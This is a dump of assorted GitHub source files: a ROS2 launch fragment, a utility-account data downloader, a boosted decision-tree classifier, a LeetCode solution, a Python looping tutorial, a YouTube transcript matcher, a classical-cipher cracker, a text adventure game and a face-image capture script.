ld.add_action(LBRROS2ControlMixin.arg_ctrl_cfg())\n ld.add_action(LBRROS2ControlMixin.arg_ctrl())\n ld.add_action(OpaqueFunction(function=launch_setup))\n return ld\n","repo_name":"lbr-stack/lbr_fri_ros2_stack","sub_path":"lbr_bringup/launch/real.launch.py","file_name":"real.launch.py","file_ext":"py","file_size_in_byte":5962,"program_lang":"python","lang":"en","doc_type":"code","stars":79,"dataset":"github-code","pt":"21"}
+{"seq_id":"31099771055","text":"import requests\nimport urllib.parse\nfrom lxml import html\nfrom .config import config\n\nclass FileReader:\n def readFile(self):\n s=requests.Session()\n headers = {\n 'Content-Type': 'application/x-www-form-urlencoded'\n }\n\n # ------------ 1 ---------------------\n payload='LoginFormData.UserName=' + urllib.parse.quote(config[\"IE\"][\"UserName\"]) + '&LoginFormData.Password=' + urllib.parse.quote(config[\"IE\"][\"Password\"])\n response = s.request(\"POST\", config[\"IE\"][\"URL\"], headers=headers, data=payload)\n\n tree = html.fromstring(response.text)\n div = tree.xpath('//p[@data-testid=\"account-card-account-number\" and text()=\"' + config[\"IE\"][\"AccountId\"] + '\"]/../../..')[0]\n selectedAccountNumber = div.xpath('.//input[@name=\"SelectedAccount.AccountNumber\"]')[0].value\n rvt = div.xpath('.//input[@name=\"rvt\"]')[0].value\n flowFormId = div.xpath('.//input[@name=\"flow-form-id\"]')[0].value\n flowHandler = div.xpath('.//input[@name=\"FlowHandler\"]')[0].value\n flowScreenName = div.xpath('.//input[@name=\"FlowScreenName\"]')[0].value\n\n # ------------ 2 ---------------------\n payloadOnEvent = 'SelectedAccount.AccountNumber=' + selectedAccountNumber + '&triggers_event=AccountSelection.ToAccountAndMeterDetails&rvt=' + rvt + '&flow-form-id=' + flowFormId + '&FlowHandler=' + flowHandler + '&FlowScreenName=' + flowScreenName\n responseOnEvent = s.request(\"POST\", config[\"IE\"][\"URL\"] + \"/Accounts/OnEvent\", headers=headers, data=payloadOnEvent)\n treeAccount = html.fromstring(responseOnEvent.text)\n accountLink = treeAccount.xpath('//a[@data-testid=\"nav-details-link\"]/@href')[0]\n\n # -------------- 3 --------------------\n accountContent = s.get(config[\"IE\"][\"URL\"] + accountLink)\n treeDownload = html.fromstring(accountContent.text)\n downloadLink = treeDownload.xpath('//a[@data-testid=\"details-consumption-data-download\"]/@href')[0]\n\n\n # -------------- 4 --------------------\n downloadContent = s.get(config[\"IE\"][\"URL\"] + downloadLink)\n return downloadContent.content.decode(\"utf-8\")","repo_name":"tassotirap/ei2ha","sub_path":"fileReader.py","file_name":"fileReader.py","file_ext":"py","file_size_in_byte":2158,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"21"}
+{"seq_id":"23647499789","text":"import sklearn.metrics as metrics\nimport matplotlib.pyplot as plt\nimport csv\nimport numpy as np\nimport scipy\nimport scipy.io as sio\nimport itertools\nimport operator\nimport scipy.stats\nfrom collections import Counter\nfrom numpy import genfromtxt\n\nimport pdb\n\nMAX_HEIGHT = 100\nMIN_LEAF = 5\nDEBUGGING = False\nDATASET = \"Census\"\nITERS = 100\nFOREST = True\n\ndef shrink(size):\n if (DEBUGGING):\n return size // 120, size // 20\n else:\n return size // 6, size\n\ndef judge(number):\n\tif (number > 0.5):\n\t\treturn 1\n\telse:\n\t\treturn 0\njudge = np.vectorize(judge)\n\nclass Node:\n def __init__(self):\n self.split_rule = (None, None, None)\n self.data_points = []\n self.left = None\n self.right = None\n self.label = None\n\n def set_leaf(self, data, labels):\n self.data_points = train_data\n self.label = Counter(labels).most_common(1)[0][0]\n\nclass DecisionTree():\n def __init__(self, max_height = MAX_HEIGHT):\n self.root = Node()\n self.max_height = max_height\n\n def train(self, train_data, train_labels, weights = np.zeros((1,1))):\n if (weights.shape == (1,1)):\n weights = np.ones(train_data.shape[0]) / train_data.shape[0]\n self._train(train_data, train_labels, self.root, weights, 0)\n\n def _train(self, train_data, train_labels, node, weights, height):\n\n # if (height < 3):\n # print(\"At height: {0}\".format(height))\n\n # When there is only one training data, or only one label, or exceeding max_height\n # Define this node as a leaf\n if train_data.shape[0] < MIN_LEAF or height >= self.max_height or len(set(train_labels)) == 1:\n # print(\"Leaf height: {0}\".format(height))\n node.set_leaf(train_data, train_labels)\n\n # Else try to separate the data\n else:\n node.left = Node()\n node.right = Node()\n node.split_rule = self.segmeter(train_data, train_labels, weights)\n\n # When it turned out that the data is not separable\n if (node.split_rule == (-1, -1, False)):\n # Print the leaf height.\n # print(\"Leaf height: {0}\".format(height))\n node.set_leaf(train_data, train_labels)\n\n else:\n l_cond = train_data[:,node.split_rule[0]] <= node.split_rule[1]\n r_cond = train_data[:,node.split_rule[0]] > node.split_rule[1]\n nan_cond = np.isnan(train_data[:,node.split_rule[0]])\n train_data_l = train_data[l_cond]\n train_data_r = train_data[r_cond]\n train_labels_l = train_labels[l_cond]\n train_labels_r = train_labels[r_cond]\n weights_l = weights[l_cond]\n weights_r = weights[r_cond]\n\n # Treat nan as mode\n # If mode is greater than threshold, then the nan data are put to right\n train_data_nan = train_data[nan_cond]\n train_labels_nan = train_labels[nan_cond]\n weights_nan = weights[nan_cond]\n if (node.split_rule[2]):\n train_data_r = np.r_[train_data_r, train_data_nan]\n train_labels_r = np.r_[train_labels_r, train_labels_nan]\n weights_r = np.r_[weights_r, weights_nan]\n else:\n weights_l = np.r_[weights_l, weights_nan]\n train_data_l = np.r_[train_data_l, train_data_nan]\n train_labels_l = np.r_[train_labels_l, train_labels_nan]\n\n\n self._train(train_data_l, train_labels_l, node.left, weights_l, height + 1)\n self._train(train_data_r, train_labels_r, node.right, weights_r, height + 1)\n\n def predict(self, test_data):\n predictions = np.zeros(test_data.shape[0])\n for i in range(0, test_data.shape[0]):\n predictions[i] = self._predict(test_data[i], self.root)\n return predictions\n\n def _predict(self, data_point, node):\n if (node.label != None):\n return node.label\n else:\n if data_point[node.split_rule[0]] > node.split_rule[1] or (np.isnan(data_point[node.split_rule[0]]) and node.split_rule[2]):\n return self._predict(data_point, node.right)\n else:\n return self._predict(data_point, node.left)\n\n # Calculate how bad a split is\n def impurity(self, left_labels, left_weights, right_labels, right_weights):\n return (np.sum(left_weights) * self.entropy(left_labels) + \\\n np.sum(right_weights) * self.entropy(right_labels)) / \\\n (np.sum(left_weights) + np.sum(right_weights))\n\n # Calculate the entropy of an array of labels\n def entropy(self, labels):\n if labels.shape[0] == 0:\n return 0\n counts = np.array(Counter(labels).most_common())[:,1]\n entropy = scipy.stats.entropy(counts)\n return entropy\n\n # Find the best split for data and labels\n def segmeter(self, data, labels, weights):\n max_info_gain = 0\n max_split_rule = (-1, -1, False)\n max_split_rule_mode = np.nan\n modes = scipy.stats.mode(data)[0][0]\n\n ratio = (np.sqrt(data.shape[1]) + 1) / data.shape[1]\n on_cnt = int(data.shape[1] * ratio)\n switch = np.array(([1] * on_cnt) + [0] * (data.shape[1] - on_cnt))\n np.random.shuffle(switch)\n\n # Find the split that maximize infomation gain\n # For each feature\n for feature in range(0, data.shape[1]):\n\n if not switch[feature]:\n continue\n\n values = data[:, feature]\n mode = modes[feature]\n dist_values = np.unique(values)\n dist_values = dist_values[~np.isnan(dist_values)]\n\n\n\n # For each possible split point\n for value in dist_values:\n\n\n left_labels = labels[data[:, feature] <= value]\n left_weights = weights[data[:, feature] <= value]\n right_labels = labels[data[:, feature] > value]\n right_weights = weights[data[:, feature] > value]\n\n # Treat nan as mode of this feature.\n # If mode(which was nan) are greater than threshold, then put it to the right\n nan_labels = labels[np.isnan(data[:,feature])]\n nan_weights = weights[np.isnan(data[:,feature])]\n if (mode > value):\n right_labels = np.r_[right_labels, nan_labels]\n right_weights = np.r_[right_weights, nan_weights]\n else:\n left_labels = np.r_[left_labels, nan_labels]\n left_weights = np.r_[left_weights, nan_weights]\n\n # The value is max, cannot separate\n if (left_labels.shape[0] == 0 or right_labels.shape[0] == 0):\n info_gain = 0\n else:\n info_gain = self.entropy(labels) - self.impurity(left_labels, left_weights, right_labels, right_weights)\n\n if (info_gain > max_info_gain):\n max_split_rule = (feature, value, mode > value)\n max_info_gain = info_gain\n\n return max_split_rule\n\n def print_root(self):\n print(self.root.split_rule)\n\nclass Forest():\n def __init__(self, iters = ITERS):\n self.trees = []\n self.weights = []\n self.iters = iters\n\n def train(self, train_data, train_labels):\n self.alphas = np.ones(self.iters)\n self.weights = np.ones(train_data.shape[0]) / train_data.shape[0]\n for t in range(0, self.iters):\n cur_tree = DecisionTree()\n print(\"iter: {0}\".format(t))\n # indices = np.random.rand((train_data.shape[0])) > 0.5\n # cur_train_data = train_data[indices]\n # cur_train_labels = train_labels[indices]\n # cur_weights = self.weights[indices]\n # pdb.set_trace()\n cur_tree.train(train_data, train_labels, self.weights)\n train_pred = cur_tree.predict(train_data)\n e = metrics.accuracy_score(train_labels, train_pred)\n self.alphas[t] = 0.5 * np.log(e / (1 - e))\n for i in range(0, train_data.shape[0]):\n indicator = int(train_labels[i] == train_pred[i])\n self.weights[i] = self.weights[i] * np.exp( -self.alphas[t] * indicator)\n self.weights = self.weights / np.sum(self.weights)\n self.trees.append(cur_tree)\n cur_tree.print_root()\n\n def predict(self, test_data):\n predictions = np.zeros(test_data.shape[0])\n self.alphas = self.alphas / np.sum(self.alphas)\n for i in range(0, self.iters):\n predictions += self.trees[i].predict(test_data) * self.alphas[i]\n return judge(predictions)\n\n\ndef load_dataset(dataset = DATASET):\n filename = 'data/census_data/census_data.mat'\n data = sio.loadmat(filename)\n train_data = data['training_data']\n train_labels = data['training_labels'][0]\n test_data = data['test_data']\n\n rng_state = np.random.get_state()\n np.random.shuffle(train_data)\n np.random.set_state(rng_state)\n np.random.shuffle(train_labels)\n\n val_size, train_size = shrink(train_data.shape[0])\n val_data, val_labels = train_data[0:val_size], train_labels[0:val_size]\n train_data, train_labels = train_data[val_size:train_size], train_labels[val_size:train_size]\n\n return train_data, train_labels, val_data, val_labels, test_data\n\ntrain_data, train_labels, val_data, val_labels, test_data = load_dataset()\nif (FOREST):\n\tclassifier = Forest()\nelse:\n\tclassifier = DecisionTree()\n\nclassifier.train(train_data, train_labels)\ntrain_pred = classifier.predict(train_data)\nval_pred = classifier.predict(val_data)\n\nprint(\"Train Accuracy: {0}\".format(metrics.accuracy_score(train_labels, train_pred)))\nprint(\"Validation Accuracy: {0}\".format(metrics.accuracy_score(val_labels, val_pred)))\n\ntest_pred = classifier.predict(test_data)\nid = np.array(list(range(1,len(test_pred) + 1)))\noutput = np.array([id,test_pred]).T\nnp.savetxt(DATASET + \".csv\", output, delimiter = ',')\n","repo_name":"harrytflv/census","sub_path":"decision_tree.py","file_name":"decision_tree.py","file_ext":"py","file_size_in_byte":10164,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}
+{"seq_id":"18219026072","text":"class Solution:\n def numberOfPairs(self, nums: List[int]) -> List[int]:\n ans = [0] * 2\n count = collections.Counter(nums)\n\n for i in range(101):\n ans[0] += count[i] // 2\n ans[1] += count[i] & 1\n\n return ans\n","repo_name":"walkccc/LeetCode","sub_path":"solutions/2341. Maximum Number of Pairs in Array/2341.py","file_name":"2341.py","file_ext":"py","file_size_in_byte":230,"program_lang":"python","lang":"en","doc_type":"code","stars":756,"dataset":"github-code","pt":"21"}
+{"seq_id":"16425624683","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# # Looping Syntax \n# \n# Loops are used for repetitive tasks:\n# \n# Instead of this:\n# \n# `print(\"string\")\n# print(\"string\")\n# print(\"string\")\n# print(\"string\")`\n# ...\n# \n# You can do this:\n# \n# `x=1\n# while x<5:\n# print(\"string\")`\n\n# In[1]:\n\n\nx=1\nwhile x<5:\n print(\"string\")\n print(\"Current x is :\",x)\n x=x+1\n print(\"Final x is :\",x)\n\n\n# ## Counted Loop\n# \n# `for x in range(1,5):\n# print (x)`\n\n# In[2]:\n\n\nfor x in range(1,5):\n print(x)\n\n\n# In[3]:\n\n\n# counted loop\nn = range(1,10,5)\nprint(n)\nfor i in n:\n print (i, \"python\")\n\n\n# ## List Loop\n# \n# - Lost loops iterate over the value in a list\n# - The loop will execute once for each value in the list\n\n# In[4]:\n\n\n# list loop\nmylist = [[1,2],[3,6],[4,5]]\n# number of columns in a multi dimensional list - len(mylist[0]) ->2\n# number of rows len(mylist) ->3\nfor item in mylist: \n print (item, \"times Python\")\n \n\n\n# In[5]:\n\n\n# breaking out of loops\n# find the maximum number below 1000 that divides by 12\nfor n in range(1000, 0, -1):\n print(n)\n div = n % 12\n print(div)\n if div == 0:\n print (n)\n break\n\n\n\n# Q1)Why use break above?\n\n# In[6]:\n\n\ncv = [[0.1,1],[0.5,11],[0.8,3]]\ncw=0.6\n\n#calculate overall score list for single criterion\n\ndlist = []\nfor i in cv:\n dlist = dlist +i\n print(dlist)\n \n # overall = i*cw\n #print(overall)\n \noveralls=[]\nfor i in dlist:\n overall= i*cw\n overalls.append(overall)\n \nprint(overalls) \n#for i in range(0, len(cv)):\n# print(i)\n\n\n# In[7]:\n\n\ncv = [0.1,0.5,0.8]\ncw=0.6\n\noverall =[]\n\nfor i in range(0, len(cv)):\n overall.append(cv[i]*cw)\n \nprint (overall)\n\n\n# In[8]:\n\n\ncv1= [0.1,0.5,0.8]\ncv2 = [0.2,0.3,0.4]\ncw=[0.6, 0.4]\noveralls=[]\n\n\n\n#check if the both criterion has the equal number of elements\n#calculate overall score list for criteria\n\n\n# In[9]:\n\n\ncv1= [0.1,0.5,0.8]\ncv2 = [0.2,0.3,0.4]\ncw=[0.6, 0.4]\noveralls=[]\n\ncw[1]\n\nif len(cv1)==len(cv2):\n for i in range(0,len(cv1)): \n overall = cv1[i]*0.6+cv2[i]*0.4\n \n overalls.append(overall)\n print(overalls)\nelse:\n print(\"Criteria lists are not equal!\")\n\n","repo_name":"salapayca/mappypython","sub_path":"_build/jupyter_execute/9_Looping_Around.py","file_name":"9_Looping_Around.py","file_ext":"py","file_size_in_byte":2166,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}
+{"seq_id":"16037145473","text":"from BikerEnv import State\nfrom numpy.random import random\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom sklearn.metrics import mean_squared_error\nimport random\n\nclass ValueFunctionApproximator:\n def __init__(self, n=4) -> None:\n self.weights = random(size=n)\n\n def predict(self, s, a=None):\n pass\n\n def stochastic_gradient_descent(X, y_true, epochs, learning_rate=0.01): # X-> train data, y_true -> test outcome data(count), epoch-> iterations\n\n number_of_features = X.shape[1]\n\n # numpy array with 1 row and columns equal to number of features\n w = np.ones(shape=(number_of_features))\n b = 0 # bias\n total_samples = y_true.shape[0]\n\n cost_list = []\n epoch_list = []\n\n for i in range(epochs):\n random_index = random.randint(0, total_samples - 1) # random index from total samples\n\n sample_x = X.iloc[random_index]\n sample_y = y_true.iloc[random_index]\n\n sample_x_transp = X.iloc[random_index, :].values.reshape(1, X.shape[1])\n\n y_predicted = abs(np.dot(w, sample_x.T) + b) #abs value due to longtitude having a negative value a lot\n\n #gradient for weight and bias\n w_grad = -(2 / total_samples) * (sample_x_transp.T.dot(y_predicted - sample_y))\n b_grad = -(2 / total_samples) * (y_predicted - sample_y)\n\n w = w - learning_rate * w_grad # update weight\n b = b - learning_rate * b_grad # bias update\n\n mse = mean_squared_error(sample_y, y_predicted)\n\n if i % 50 == 0: # every 50th iteration record the cost and epoch value\n cost_list.append(mse)\n epoch_list.append(i)\n\n return w, mse","repo_name":"Adeleet/1CM240-Group1-Bike-Rebalancing","sub_path":"VFA.py","file_name":"VFA.py","file_ext":"py","file_size_in_byte":1746,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}
+{"seq_id":"8297270423","text":"import sys,os,shutil,glob\nsys.path.append(\".local/lib/python{}.{}/site-packages\".format(sys.version_info.major,sys.version_info.minor))\nfrom magiconfig import ArgumentParser, MagiConfigOptions, ArgumentDefaultsRawHelpFormatter\nfrom argparse import _AppendAction, Action\nfrom collections import OrderedDict\nfrom data import EventData\nfrom utils import config_path, import_attrs\nconfig_path()\n\nclass OrderedDictAction(_AppendAction):\n def __call__(self, parser, namespace, values, option_string=None):\n items = getattr(namespace, self.dest, None)\n if items is None:\n items = OrderedDict()\n else:\n items = self._copy_items(items)\n results = self.parse_params(values)\n items.update(results)\n setattr(namespace, self.dest, items)\n\n # from argparse\n def _copy_items(self, items):\n if items is None:\n return []\n # The copy module is used only in the 'append' and 'append_const'\n # actions, and it is needed only when the default value isn't a list.\n # Delay its import for speeding up the common case.\n if type(items) is list:\n return items[:]\n import copy\n return copy.copy(items)\n\n def parse_params(self, args):\n pass\n\nclass ParamAction(OrderedDictAction):\n def parse_params(self, args):\n results = []\n counter = 0\n while counter < len(args):\n name = str(args[counter])\n counter += 1\n\n pmin = float(args[counter])\n counter += 1\n\n pmax = float(args[counter])\n counter += 1\n\n results.append((name, (pmin,pmax)))\n return results\n\nclass FileSepAction(ParamAction):\n _final_type = str\n def parse_params(self, args):\n results = []\n counter = 0\n key = []\n for counter in range(len(args)):\n if counter==len(args)-1:\n results.append((tuple(key), str(args[counter])))\n else:\n try:\n k = float(args[counter])\n except:\n k = self._final_type(args[counter])\n key.append(k)\n return results\n\nclass XsecSepAction(FileSepAction):\n _final_type = float\n\nclass ImportAction(Action):\n def __call__(self, parser, namespace, values, option_string=None):\n if isinstance(values,str):\n item = import_attrs(values, self.dest)\n setattr(namespace, self.dest, item)\n\n# wrapper to handle common arguments and checks\nclass EVNParser:\n def __init__(self, name, basic=False, model_default=\"models\"):\n self.parser = ArgumentParser(config_options=MagiConfigOptions(), formatter_class=ArgumentDefaultsRawHelpFormatter)\n # common arguments\n self.parser.add_argument(\"--name\", type=str, default=name, help=\"name of operation (used for saved config filename and output subdirectory)\")\n self.parser.add_argument(\"-f\", \"--force\", default=False, action=\"store_true\", help=\"overwrite existing config\")\n self.parser.add_argument(\"-v\", \"--verbose\", default=False, action=\"store_true\", help=\"enable verbose output\")\n self.parser.add_argument(\"--outf\", type=str, required=True, help=\"output folder\")\n self.parser.add_argument(\"--model-dir\", type=str, default=model_default, help=\"directory for saved model file\")\n if basic: return\n self.parser.add_argument(\"--process\", type=str, required=True, choices=sorted(list(EventData.processes)), help=\"process name\")\n self.parser.add_argument(\"--filedir\", type=str, required=True, help=\"directory for process files\")\n self.parser.add_argument(\"--filenames\", type=str, default=[], nargs='+', required=True, help=\"process files for training\")\n self.parser.add_argument(\"--filenames-sep\", metavar=(\"key1 [key2...] filename\"), default=OrderedDict(), action=FileSepAction, nargs='*', help=\"separate process files for analysis (keys assumed to be float or str) (can be called multiple times)\")\n self.parser.add_argument(\"--xsecs-sep\", metavar=(\"key1 [key2...] xsec\"), default=OrderedDict(), action=XsecSepAction, nargs='*', help=\"separate process cross sections for analysis (keys assumed to be float or str) (can be called multiple times)\")\n self.parser.add_argument(\"--params\", metavar=(\"name min max\"), default=OrderedDict(), action=ParamAction, nargs='*', help=\"param (theta) name(s) & range(s) (can be called multiple times)\")\n self.parser.add_argument(\"--inputs\", type=str, default=[], nargs='+', help=\"input feature name(s)\")\n self.parser.add_argument(\"--theory\", type=str, default=[], nargs='+', help=\"theory variable name(s)\")\n self.parser.add_argument(\"--extras\", type=str, default=[], nargs='+', help=\"extra name(s)\")\n self.parser.add_argument(\"--weights\", type=str, default=[], nargs='+', help=\"weight name(s)\")\n self.parser.add_argument(\"--selections\", metavar=(\"name min max\"), type=str, default=None, nargs='+', action=ParamAction, help=\"selection variable name(s) & range(s)\")\n self.parser.add_argument(\"--axes\", required=True, action=ImportAction, help=\"axis info file (provides dict of dicts)\")\n\n def parse_args(self, argv=None, checker=None, save=lambda x: True):\n if argv is None: argv = sys.argv[1:]\n args = self.parser.parse_args(argv)\n # do any common error checking\n # do specific error checking\n if checker is not None:\n args = checker(args)\n # save the config\n if save(args):\n os.makedirs(args.outf, exist_ok=True)\n oname = \"{}/config_{}.py\".format(args.outf,args.name)\n if not args.force and os.path.isfile(oname):\n raise RuntimeError(\"Will not overwrite existing output config {}\".format(oname))\n self.parser.write_config(args, oname)\n return args\n\n def get_process(self, args, mask=None):\n process = EventData.processes[args.process](args.filedir, args.filenames, args.filenames_sep, args.params, args.inputs, args.theory, args.extras, args.weights, args.xsecs_sep, args.selections, mask=mask)\n return process\n","repo_name":"kpedro88/evn_svj_public","sub_path":"args.py","file_name":"args.py","file_ext":"py","file_size_in_byte":6167,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}
+{"seq_id":"29535431144","text":"import json\nfrom urllib import response\nfrom youtube_transcript_api import YouTubeTranscriptApi\nfrom flask import Flask, request\nimport spacy\nnlp = spacy.load('en_core_web_lg')\n#https://www.youtube.com/watch?v=7y_2jQlnKag\n#Introduction to Factoring Higher Degree Factorials\n\napp = Flask(__name__)\n\n@app.route(\"/match\", methods = [\"GET\"])\ndef findBestMatch():\n youtubeID = request.args.get('yt_id')\n userQuery = request.args.get('q')\n transCpt = YouTubeTranscriptApi.get_transcript(youtubeID)\n ans = \"\"\n ansTime = 0.0\n doc1 = nlp(userQuery)\n for transcriptEntry in transCpt:\n transcriptEntry['text'].replace('\\n', ' ')\n doc2 = nlp(transcriptEntry['text'])\n if doc1.similarity(doc2) > ansTime:\n ans = transcriptEntry['text']\n ansTime = transcriptEntry['start']\n return {'ans': ans, 'ansTime': ansTime}\n\nif __name__ == '__main__':\n app.run(debug=True)","repo_name":"dhruvv/hackmit-statesquad","sub_path":"backend/ytb.py","file_name":"ytb.py","file_ext":"py","file_size_in_byte":876,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}
+{"seq_id":"26148064691","text":"from affine import Affine\nfrom vigenere import Vigenere\n\n\ndef main():\n cipher_file = open('cipher.txt', 'r')\n cipher_text = cipher_file.read()\n print('*** cracking with affine cipher method ***')\n affine = Affine()\n decrypted = affine.crack(cipher_text)\n if decrypted:\n return decrypted\n print(\"*** can't crack with affine method ***\")\n\n print(\"*** cracking with vigenere ***\")\n vigenere = Vigenere()\n decrypted = vigenere.crack(cipher_text)\n if decrypted:\n return decrypted\n else:\n return None\n\n\nif __name__ == '__main__':\n m = main()\n if m:\n print(f'cracked message is ====>\\t {m}')\n else:\n print(\"Can't crack the message\")\n","repo_name":"Sinaeskandari/Affine-Vigenere-Cracker","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":706,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}
+{"seq_id":"73749976694","text":"#! python3\r\n\r\n# The player must choose the options. \r\n# They may try to guest the animal will be present and reach the score more than 10 during encounter the animals. \r\n\r\nimport time, math, random, sys, textwrap\r\nimport textgame, constants\r\n\r\n\r\nclass Game(object):\r\n def __init__(self):\r\n self.done = False\r\n self.score = 5 # 10 score is the goal to win\r\n self.energy = 5 # 5 is the starting energy\r\n self.full = 10 # 10 is the maximum energy \r\n self.turns = 0 # the number of game you takes\r\n\r\n def intro(self):\r\n for char in textwrap.dedent(constants.INTRO):\r\n time.sleep(0.05)\r\n sys.stdout.write(char)\r\n sys.stdout.flush()\r\n\r\n time.sleep(0.1)\r\n\r\n def random_object(self,value):\r\n if value == 1:\r\n return \"route\"\r\n\r\n elif value == 2:\r\n return \"wolf\"\r\n \r\n elif value == 3:\r\n return \"bear\"\r\n \r\n else:\r\n return \"tiger\"\r\n\r\n def status(self):\r\n # Alert User with energy\r\n print(f\"Your energy is {self.energy}\")\r\n \r\n # Alert user with score \r\n print(f\"Your score is {self.score}\")\r\n\r\n def random_event(self, choice):\r\n if choice != \"s\":\r\n i = random.randint(1,4)\r\n return i\r\n else:\r\n return 0\r\n\r\n def increase_energy(self):\r\n if self.energy < self.full:\r\n self.energy += 1\r\n \r\n else:\r\n print(\"\\nYour energy reach the maximum.\")\r\n\r\n def apply_choice(self, choice, randvalue):\r\n if choice.lower().strip(\".,! \") == \"q\":\r\n self.done = True\r\n\r\n elif choice.lower().strip(\"!,. \") == \"s\":\r\n print(f\"\"\"\r\n ---Status Check---\r\n energy: {self.energy}\r\n score: {self.score}\r\n for sucess {10 - self.score} socre behind you. \r\n lost {self.score} score will failed.\r\n \r\n\"\"\")\r\n\r\n elif choice.lower().strip(\",.! \") == \"r\":\r\n self.increase_energy()\r\n if randvalue == 1:\r\n print(\"\\n A new path appears. You increased energy and your score remains the same.\")\r\n \r\n else:\r\n self.score -= 1\r\n print(f\"\\nWhile you are resting you encounter {self.random_object(randvalue)}. lose 1 point.\")\r\n\r\n\r\n elif choice.lower().strip(\"!,. \") == \"d\":\r\n if self.energy > 1:\r\n if randvalue == 4:\r\n self.energy -= 1\r\n self.score -= 1\r\n print(\"\\n You encounter Tiger! Tiger is fast, and you are caught. lost 1 score.\")\r\n \r\n elif randvalue == 1:\r\n self.energy -= 1\r\n self.score -= 1\r\n print(\"\\n You have missed a easier route to home. You lose 1 point!\")\r\n\r\n else:\r\n self.score += 1\r\n print(\"\\n You detour correctly, gets 1 score.\")\r\n self.energy -= 2\r\n\r\n else:\r\n self.score -= 1\r\n print(\"\\n Your energy is used up, you cannot detour! lost 1 points.\")\r\n\r\n elif choice.lower().strip(\"!,. \") == \"e\":\r\n if randvalue == 1:\r\n self.score += 1\r\n print(\"\\n You explore a new route, gets 1 point.\")\r\n\r\n else:\r\n self.score -= 1\r\n print(\"\\nYou did not explore anything, lose 1 point.\")\r\n\r\n elif choice.lower().strip(\"!,. \") == \"f\": \r\n if randvalue == 4:\r\n self.energy -= 1\r\n self.score -=1 \r\n print(\"\\nTiger's speed is really fast and comes to attack you. Fortunately it is not hungry and it walks away.\")\r\n \r\n elif randvalue == 1:\r\n self.energy -= 1\r\n self.score -=1 \r\n print(\"\\nYou have missed a easier route to home. You lose 1 point!\")\r\n\r\n else:\r\n print(f\"\\nGood job {self.random_object(randvalue)} cannot reach you! Your score keeps the same.\")\r\n\r\n elif choice.lower().strip(\"!,. \") == \"h\": \r\n if randvalue == 1:\r\n self.score -= 1\r\n print(\"\\nThere is a route appears to your sight, but unfortunately you choose to hide, so your score minus 1.\")\r\n\r\n else:\r\n self.score += 1 \r\n print(f\"\\nA {self.random_object(randvalue)} pass by you, but since you are hide at a great spot it did not see you. Score plus 1!\")\r\n\r\n def end_game(self):\r\n ending = None\r\n\r\n # The Win Condition\r\n if self.score > 9 or self.turns > 9:\r\n time.sleep(2)\r\n ending = f\"\"\"\\\r\n ------------------------ \r\n ...Lucky for you! A helicopter is patrol nearby, it saw you and arrived to help you!\r\n Without losing anything you are safely back home.\r\n It takes you {self.turns} turns.\r\n The Helicopter will bring you home.\r\n\r\n -------- Game Over -------- \r\n \"\"\"\r\n self.done = True \r\n\r\n # end game for agents catching up\r\n elif self.score < 0:\r\n ending = f\"\"\"\\\r\n \r\n ---------------------\r\n ...... Failed! ......\r\n You now is trapped in the forest without any food or water left in your backpack.\r\n \r\n After two days of hunger you \r\n You failed in {self.turns} turns.\r\n If continue you may have less chance to success.\r\n More risk will be present to you if continue.\r\n You should change your strategy or pick options way.\r\n \r\n -------- Game Over --------\r\n \"\"\"\r\n\r\n self.done = True\r\n\r\n if self.done == True:\r\n if ending != None:\r\n for char in textwrap.dedent(ending):\r\n time.sleep(0.05)\r\n sys.stdout.write(char)\r\n sys.stdout.flush()\r\n\r\n print(f\"\\nYou finished the game in {self.turns} turns.\\n\")\r\n else:\r\n print(\"Thanks for playing!\")\r\n\r\n def update(self):\r\n # Main Instructions\r\n print(constants.CHOICES)\r\n\r\n self.status()\r\n\r\n choice = input(\"What do you want to do? \")\r\n self.turns += 1\r\n r = self.random_event(choice.lower())\r\n self.apply_choice(choice.lower(),r)\r\n\r\n self.end_game()\r\n time.sleep(1)\r\n","repo_name":"RachelC1231/Text-Game","sub_path":"textgame.py","file_name":"textgame.py","file_ext":"py","file_size_in_byte":6617,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}
+{"seq_id":"25235450495","text":"\n# Creating database\n# It captures images and stores them in datasets \n# folder under the folder name of sub_data\nimport cv2, sys, numpy, os\nfrom imutils.video import VideoStream\nimport imutils\nimport time\n\nimport argparse\n\n# All the faces data will be\n# present this folder\n\n\ndef main(args):\n datasets = 'Dataset/FaceData/raw' \n haar_file = 'src/Models/haarcascade_frontalface_default.xml'\n face_cascade = cv2.CascadeClassifier(haar_file)\n \n # These are sub data sets of folder, \n # for my faces I've used my name you can \n # change the label here\n sub_data = args.username \n print (sub_data)\n path = os.path.join(datasets, sub_data)\n if not os.path.isdir(path):\n os.mkdir(path)\n \n cap = VideoStream(src=0).start()\n\n\n # The program loops until it has 30 images of the face.\n count = 0\n while count < 100: \n frame = cap.read()\n frame = imutils.resize(frame, width=600)\n frame = cv2.flip(frame, 1)\n cv2.imshow(sub_data, frame)\n gray = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY)\n faces = face_cascade.detectMultiScale(gray, 1.3, 4)\n for (x, y, w, h) in faces:\n cv2.imwrite('% s/% s.png' % (path, count), frame)\n count += 1\n print (count)\n time.sleep(0.2) \n\n \n key = cv2.waitKey(10)\n if key == 27:\n break\ndef parse_arguments(argv):\n parser = argparse.ArgumentParser()\n\n parser.add_argument('username', type=str,\n help='Path to the test data directory containing aligned images used for testing.')\n \n return parser.parse_args(argv)\n\nif __name__ == '__main__':\n main(parse_arguments(sys.argv[1:]))\n","repo_name":"hoanglnit/FaceNetPi","sub_path":"build_raw_dataset.py","file_name":"build_raw_dataset.py","file_ext":"py","file_size_in_byte":1698,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
